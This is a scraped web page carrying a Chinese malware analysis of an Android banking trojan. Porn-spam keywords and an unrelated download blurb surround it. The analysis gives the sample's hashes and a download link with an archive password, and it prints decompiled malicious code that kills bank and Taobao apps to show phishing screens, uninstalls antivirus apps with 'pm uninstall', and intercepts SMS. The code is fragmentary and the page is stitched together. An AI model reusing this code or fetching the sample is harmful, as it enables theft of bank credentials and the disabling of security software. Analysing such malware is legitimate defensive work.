日本熟妇浓毛,中文精品一卡2卡3卡4卡,99久久精品国产综合

(HostsAppend)Hosts文件編輯工具1.0免費(fèi)版

類型：文件處理大�。�209KB語言：中文評(píng)分：7.0
標(biāo)簽：

立即下載

一、 病毒樣本基本信息

FileName: b5910a432d2b866e1028f31874edb32f .apk
File MD5: b5910a432d2b866e1028f31874edb32f

SHA1:0CEEB0A29AC4B24E1EFDD0F57ACFC64388CF5AC1

File Size: 829006 Byte

Package：langthing.nend

Download：http://yunpan.cn/Q4qHuRLaNivtd 訪問密碼 3a90 解壓密碼：52pojie

// 該病毒首先偽裝成系統(tǒng)程序防止卸載；然后試著去卸載安全軟件；監(jiān)測(cè)各種銀行應(yīng)用；對(duì)需要攔截短信的關(guān)鍵字進(jìn)行了加密，增加了分析的難度；沒有MAIN和LAUNCHER組件,安裝后沒有圖標(biāo)，防止用戶察覺到安裝了應(yīng)用

二、 病毒代碼分析

查看AndroidManifest.xml配置文件，可以發(fā)現(xiàn)賦予了病毒非常多的權(quán)限，且是高危的權(quán)限，例如發(fā)送短信、撥打電話、讀取日志文件、重啟應(yīng)用程序等等，且沒有MAIN和LAUNCHER組件

<manifest android:versionCode="1" android:versionName="1.1" package="langthing.nend"

xmlns:android="http://schemas.android.com/apk/res/android">

<uses-permission android:name="android.permission.RECEIVE_SMS" /> //接收短信

<uses-permission android:name="android.permission.SEND_SMS" /> //發(fā)送短信

<uses-permission android:name="android.permission.READ_SMS" /> //讀取短息

<uses-permission android:name="android.permission.WRITE_SMS" /> //編輯短信

<uses-permission android:name="android.permission.SEND_SMS" />

<uses-permission android:name="android.permission.READ_CONTACTS" /> //讀取通訊錄

<uses-permission android:name="android.permission.WRITE_SETTINGS" /> //讀取系統(tǒng)設(shè)置的數(shù)據(jù)庫權(quán)限

<uses-permission android:name="android.permission.READ_LOGS" /> //讀取日志文件

<uses-permission android:name="android.permission.WRITE_CONTACTS" />//編輯通訊錄聯(lián)系人

<uses-permission android:name="android.permission.READ_PHONE_STATE" />//讀取電話狀態(tài)

<uses-permission android:name="android.permission.CALL_PHONE" /> //撥打電話

<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />//接收開機(jī)信息

<uses-permission android:name="android.permission.GET_TASKS" /> //獲取運(yùn)行程序信息

<uses-permission android:name="android.permission.RESTART_PACKAGES" />//重啟應(yīng)用程序

查看AndroidManifest.xml配置文件，可以發(fā)現(xiàn)當(dāng)手機(jī)接收到TReceiver、eviceAdminReceiver、Alarmreceiver等組件時(shí)就會(huì)啟動(dòng)程序

receiver android:name=".TReceiver">

<intent-filter android:priority="2147483647">

</intent-filter>

</receiver>

<intent-filter>

</intent-filter>

</receiver>

<intent-filter>

</intent-filter>

</receiver>

<intent-filter>

</intent-filter>

惡意注入代碼的代碼樹如下：

當(dāng)程序安裝后，會(huì)偽裝成系統(tǒng)程序，防止卸載。如圖：

查看langthing.nend.main偽裝成系統(tǒng)代碼如下：

private void b()

{

Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");

localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.c);

localIntent.putExtra("android.app.extra.ADD_EXPLANATION", "------ android ------"); // 偽裝成系統(tǒng)應(yīng)用

startActivityForResult(localIntent, 1);

}

當(dāng)應(yīng)用監(jiān)測(cè)到銀行客戶端啟動(dòng)時(shí)，就會(huì)終止個(gè)銀行進(jìn)程，并為工商銀行、淘寶等定制了高仿真“釣魚界面”

private void e()

{

ComponentName localComponentName = ((ActivityManager.RunningTaskInfo)p.getRunningTasks(1).get(0)).topActivity;

ActivityManager localActivityManager = (ActivityManager)getSystemService("activity");

String str = localComponentName.getClassName();

if ((str.contains("gs.gs")) || (str.contains("js.js")) || (str.contains("jt.jt")) || (str.contains("tb.tb")) || (str.contains("dz.dz")))

{

if (a(getApplicationContext(), "com.icbc"))

localActivityManager.restartPackage("com.icbc");

if (a(getApplicationContext(), "com.chinamworld.main"))

localActivityManager.restartPackage("com.chinamworld.main");

if (a(getApplicationContext(), "com.bankcomm"))

localActivityManager.restartPackage("com.bankcomm");

if (a(getApplicationContext(), "com.taobao.taobao"))

localActivityManager.restartPackage("com.taobao.taobao");

if (a(getApplicationContext(), "com.android.bankabc"))

localActivityManager.restartPackage("com.android.bankabc");

if (a(getApplicationContext(), "cmb.pb"))

localActivityManager.restartPackage("cmb.pb");

if (a(getApplicationContext(), "com.rytong.bankgdb"))

localActivityManager.restartPackage("com.rytong.bankgdb");

if (a(getApplicationContext(), "com.cib.bankcib"))

localActivityManager.restartPackage("com.cib.bankcib");

if (a(getApplicationContext(), "com.rytong.bankps"))

localActivityManager.restartPackage("com.rytong.bankps");

if (a(getApplicationContext(), "cn.com.njcb.android.mobilebank"))

localActivityManager.restartPackage("cn.com.njcb.android.mobilebank");

if (a(getApplicationContext(), "com.ecitic.bank.mobile"))

localActivityManager.restartPackage("com.ecitic.bank.mobile");

if (a(getApplicationContext(), "com.cebbank.bankebb"))

localActivityManager.restartPackage("com.cebbank.bankebb");

if (a(getApplicationContext(), "cn.com.cmbc.mbank"))

localActivityManager.restartPackage("cn.com.cmbc.mbank");

if (a(getApplicationContext(), "cn.com.spdb.mobilebank.per"))

localActivityManager.restartPackage("cn.com.spdb.mobilebank.per");

if (a(getApplicationContext(), "com.pingan.pabank.activity"))

localActivityManager.restartPackage("com.pingan.pabank.activity");

if (a(getApplicationContext(), "com.gzrcb.mobilebank"))

localActivityManager.restartPackage("com.gzrcb.mobilebank");

if (a(getApplicationContext(), "cn.com.cqb.mobilebank.per"))

localActivityManager.restartPackage("cn.com.cqb.mobilebank.per");

if (a(getApplicationContext(), "com.chinamworld.bocmbci"))

localActivityManager.restartPackage("com.chinamworld.bocmbci");

if (a(getApplicationContext(), "com.rytong.app.bankhx"))

localActivityManager.restartPackage("com.rytong.app.bankhx");

if (a(getApplicationContext(), "com.csii.huzhou.mobilebank"))

localActivityManager.restartPackage("com.csii.huzhou.mobilebank");

if (a(getApplicationContext(), "cn.com.shbank.mper"))

localActivityManager.restartPackage("cn.com.shbank.mper");

if (a(getApplicationContext(), "com.rytong.bankqd"))

localActivityManager.restartPackage("com.rytong.bankqd");

if (a(getApplicationContext(), "com.tlbank"))

localActivityManager.restartPackage("com.tlbank");

if (a(getApplicationContext(), "com.sookin.scyh"))

localActivityManager.restartPackage("com.sookin.scyh");

if (a(getApplicationContext(), "cn.com.hzb.mobilebank.per"))

localActivityManager.restartPackage("cn.com.hzb.mobilebank.per");

if (a(getApplicationContext(), "com.chinamworld.klb"))

localActivityManager.restartPackage("com.chinamworld.klb");

}

if (str.contains("icbc"))

{

Cursor localCursor27 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "gs" }, null, null, null);

if ((localCursor27.moveToFirst()) && (localCursor27.getInt(localCursor27.getColumnIndex("jilu")) == 0))

{

localActivityManager.restartPackage("com.icbc");

new Intent("android.intent.action.MAIN");

Intent localIntent53 = new Intent("android.intent.action.MAIN");

localIntent53.setFlags(268435456);

localIntent53.addCategory("android.intent.category.HOME");

startActivity(localIntent53);

Intent localIntent54 = new Intent(getApplicationContext(), gs.class);

localIntent54.setFlags(268435456);

startActivity(localIntent54);

}

if (str.contains("com.chinamworld.main"))

{

Cursor localCursor26 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "js" }, null, null, null);

if ((localCursor26.moveToFirst()) && (localCursor26.getInt(localCursor26.getColumnIndex("jilu")) == 0))

{

localActivityManager.restartPackage("com.chinamworld.main");

new Intent("android.intent.action.MAIN");

Intent localIntent51 = new Intent("android.intent.action.MAIN");

localIntent51.setFlags(268435456);

localIntent51.addCategory("android.intent.category.HOME");

startActivity(localIntent51);

Intent localIntent52 = new Intent(getApplicationContext(), js.class);

localIntent52.setFlags(268435456);

startActivity(localIntent52);

}

if (str.contains("bankcomm"))

{

Cursor localCursor25 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "jt" }, null, null, null);

if ((localCursor25.moveToFirst()) && (localCursor25.getInt(localCursor25.getColumnIndex("jilu")) == 0))

{

localActivityManager.restartPackage("com.bankcomm");

new Intent("android.intent.action.MAIN");

Intent localIntent49 = new Intent("android.intent.action.MAIN");

localIntent49.setFlags(268435456);

localIntent49.addCategory("android.intent.category.HOME");

startActivity(localIntent49);

Intent localIntent50 = new Intent(getApplicationContext(), jt.class);

localIntent50.setFlags(268435456);

startActivity(localIntent50);

}

if (str.contains("taobao"))

{

Cursor localCursor24 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "tb" }, null, null, null);

if ((localCursor24.moveToFirst()) && (localCursor24.getInt(localCursor24.getColumnIndex("jilu")) == 0))

{

localActivityManager.restartPackage("com.taobao.taobao");

new Intent("android.intent.action.MAIN");

Intent localIntent47 = new Intent("android.intent.action.MAIN");

localIntent47.setFlags(268435456);

localIntent47.addCategory("android.intent.category.HOME");

startActivity(localIntent47);

Intent localIntent48 = new Intent(getApplicationContext(), tb.class);

localIntent48.setFlags(268435456);

startActivity(localIntent48);

}

// 終止各銀行進(jìn)程

查找安全軟件并卸載安全軟件

for (g = "Already root"; ; g = "NOroot")

{

this.C = 5;

this.E = 5;

this.B = new String[this.C];

this.D = new String[this.E];

this.B[0] = "pm uninstall com.qihoo360.mobilesafe"; //卸載360、騰訊、金山等相關(guān)的安全軟件

this.B[1] = "pm uninstall com.tencent.qqpimsecure";

this.B[2] = "pm uninstall com.ijinshan.mguard";

this.B[3] = "pm uninstall com.ijinshan.duba";

this.B[4] = "pm uninstall com.anguanjia.safe";

this.D[0] = "com.qihoo360.mobilesafe";

this.D[1] = "com.tencent.qqpimsecure";

this.D[2] = "com.ijinshan.mguard";

this.D[3] = "com.ijinshan.duba";

this.D[4] = "com.anguanjia.safe";

this.s = new o();

攔截相關(guān)短信：

f (i5 == 1)

if ((server.f == 0) && (server.a != i3))

{

server.a(this.a, 1);

server.b(this.a, i3);

str4 = "接收";

server.a(this.a, new o());

String str5 = server.d(this.a).a(this.a.getApplicationContext());

server.a(this.a, new n());

server.g(this.a).a(this.a.getApplicationContext(), str2, str1, str5);

localStringBuilder.append("[ ");

localStringBuilder.append(str1 + ", ");

localStringBuilder.append(i4 + ", ");

localStringBuilder.append(str2 + ", ");

localStringBuilder.append(str3 + ", ");

localStringBuilder.append(str4);

localStringBuilder.append(" ]\n\n");

if (!localCursor1.isClosed())

localCursor1.close();

}

while (true)

{

localStringBuilder.append("getSmsInPhone has executed!");

super.onChange(paramBoolean);

return;

server.f = 0;

break;

if (i5 != 2)

break;

if (server.b == i3)

break label760;

Cursor localCursor2 = server.c.a("send", null, null, null, null, null, "_id ASC");

if (localCursor2.moveToFirst())

{

localCursor2.getColumnIndex("_id");

int i6 = localCursor2.getColumnIndex("sSend");

server.a(this.a, localCursor2.getString(i6));

while (localCursor2.moveToNext());

}

localCursor2.close();

if (server.h(this.a).equals("1"))

{

server.a(this.a, new o());

server.a(this.a, new n());

String str6 = server.d(this.a).a(this.a.getApplicationContext());

server.a(this.a, str2 + ";" + str1, str6);

}

server.b = i3;

str4 = "發(fā)送";

break;

localStringBuilder.append("no result!");

}

catch (SQLiteException localSQLiteException)

{

while (true)

{

continue;

label760: String str4 = "null";

}

解密密鑰：

public void a()

{

try

{

InputStream localInputStream = getAssets().open("unhi.db"); // 密鑰

FileOutputStream localFileOutputStream = new FileOutputStream(this.q + "unhi.db");

byte[] arrayOfByte = new byte[1024];

while (true)

{

int i1 = localInputStream.read(arrayOfByte);

if (i1 <= 0)

{

localFileOutputStream.flush();

localFileOutputStream.close();

localInputStream.close();

return;

}

localFileOutputStream.write(arrayOfByte, 0, i1);

}

catch (Exception localException)

{

}

public void a(String paramString)

{

if (!new File(paramString).exists())

a();

}

public void c()

{

new l(this).start();

}

public IBinder onBind(Intent paramIntent)

{

return null;

}

public void onCreate()

{

this.u = new e();

IntentFilter localIntentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");

localIntentFilter.setPriority(2147483647);

registerReceiver(this.u, localIntentFilter);

p = (ActivityManager)getSystemService("activity");

this.F = 0;

this.j = false;

b(this.s.a(getApplicationContext()), "201305:" + g + ";ver:" + Build.VERSION.RELEASE + ";Model:" + Build.MODEL);

this.q = (getApplicationContext().getFilesDir().getAbsolutePath() + "/");

a(this.q + "unhi.db");

c = new a(this, getApplicationContext().getFilesDir().getAbsolutePath() + "/unhi.db", null, 1);

m localm = new m(this, new Handler());

getContentResolver().registerContentObserver(Uri.parse("content://sms/"), true, localm);

Intent localIntent = new Intent(getApplicationContext(), log.class);

localIntent.setFlags(268435456);

startService(localIntent);

三、 總結(jié)

該病毒嘗試著去卸載安全軟件；采用了加密技術(shù)，增加了分析難度；并隱藏運(yùn)行界面，防止用戶察覺�？梢钥闯鲆苿�(dòng)安全問題越演越烈，且手段越來越高明，增加了分析難度。

// 由于本人對(duì)于密碼學(xué)方面還沒有Hello World的水平，所以無法解密相關(guān)信息，水平有限。

android病毒“銀行悍匪”獨(dú)家分析

相關(guān)文章

相關(guān)評(píng)論

閱讀本文后您有什么感想? 已有23人給出評(píng)價(jià)!

熱門評(píng)論

最新評(píng)論

發(fā)表評(píng)論查看所有評(píng)論(0)

推薦文章

相關(guān)下載

最新文章

android病毒“銀行悍匪”獨(dú)家分析

相關(guān)文章

相關(guān)評(píng)論

閱讀本文后您有什么感想? 已有23人給出評(píng)價(jià)!

熱門評(píng)論

最新評(píng)論

發(fā)表評(píng)論 查看所有評(píng)論(0)

推薦文章

相關(guān)下載

最新文章

發(fā)表評(píng)論查看所有評(píng)論(0)